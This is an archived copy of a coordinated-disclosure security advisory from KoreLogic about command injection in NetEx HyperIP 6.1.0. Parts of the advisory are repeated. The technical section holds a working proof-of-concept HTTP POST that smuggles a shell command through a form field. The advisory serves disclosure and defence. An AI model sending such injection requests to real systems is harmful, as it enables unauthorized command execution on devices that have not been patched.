  6.1.1 is expected to ship at the end of January 2018.
 2017.09.26 - 45 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.12.01 - 90 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.17 - 120 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release
  has gone live.
 2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

 See 3. Technical Description.


The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt



signature.asc
Description: OpenPGP digital signature

KL-001-2018-003 : NetEx HyperIP Post-Auth Command Execution

KL-001-2018-003 : NetEx HyperIP Post-Auth Command Execution

Title: NetEx HyperIP Post-Auth Command Execution
Advisory ID: KL-001-2018-003
Publication Date: 2018.02.08
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2018-003.txt


1. Vulnerability Details

 Affected Vendor: NetEx
 Affected Product: HyperIP
 Affected Version: 6.1.0
 Platform: Embedded Linux
 CWE Classification: CWE-78:  Improper Neutralization of Special Elements 
used in an OS Command, CWE-250: Execution
with Unnecessary Privileges
 Impact: Arbitrary Command Execution
 Attack vector: HTTPS

2. Vulnerability Description

 A command injection vulnerability can be leveraged to execute
 operating system commands.

3. Technical Description

 A POST variable is handled unsafely, allowing execution of arbitrary
 commands with the privileges of the webserver process.  In the below
 example, set_val= is used to copy an existing executable file into
 a writable directory.

   POST /hypmisc.php HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   Cookie: auth-token=b6b73844ce4df64f459948c5475a1096
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 99

   set_id=msglvl_val=$(cp /etc/profile.d/which-2.sh 
/var/ftp/pub/updates/a.run)=on=Set

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 07:20:56 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Expires: Thu, 19 Nov 1981 08:52:00 GMT
   Cache-Control: no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0
   Pragma: no-cache
   Content-Length: 1057
   Connection: close
   Content-Type: text/html; charset=UTF-8

4. Mitigation and Remediation Recommendation

 The vendor has released version 6.1.1 of HyperIP, which they state
 addresses this vulnerability.

5. Credit

 This vulnerability was discovered by Matt Bergin (@thatguylevel)
 of KoreLogic, Inc.

6. Disclosure Timeline

 2017.07.24 - KoreLogic submits vulnerability details to NetEx.
 2017.07.24 - NetEx confirms receipt.
 2017.08.16 - NetEx informs KoreLogic that this and other reported
  vulnerabilities have been addressed in the forthcoming
  release. ETA as of yet undetermined.
 2017.09.05 - 30 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.09.19 - NetEx informs KoreLogic that the forthcoming release
  6.1.1 is expected to ship at the end of January 2018.
 2017.09.26 - 45 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.12.01 - 90 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.17 - 120 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release
  has gone live.
 2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

 See 3. Technical Description.


The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt



signature.asc
Description: OpenPGP digital signature

KL-001-2018-002 : NetEx HyperIP Authentication Bypass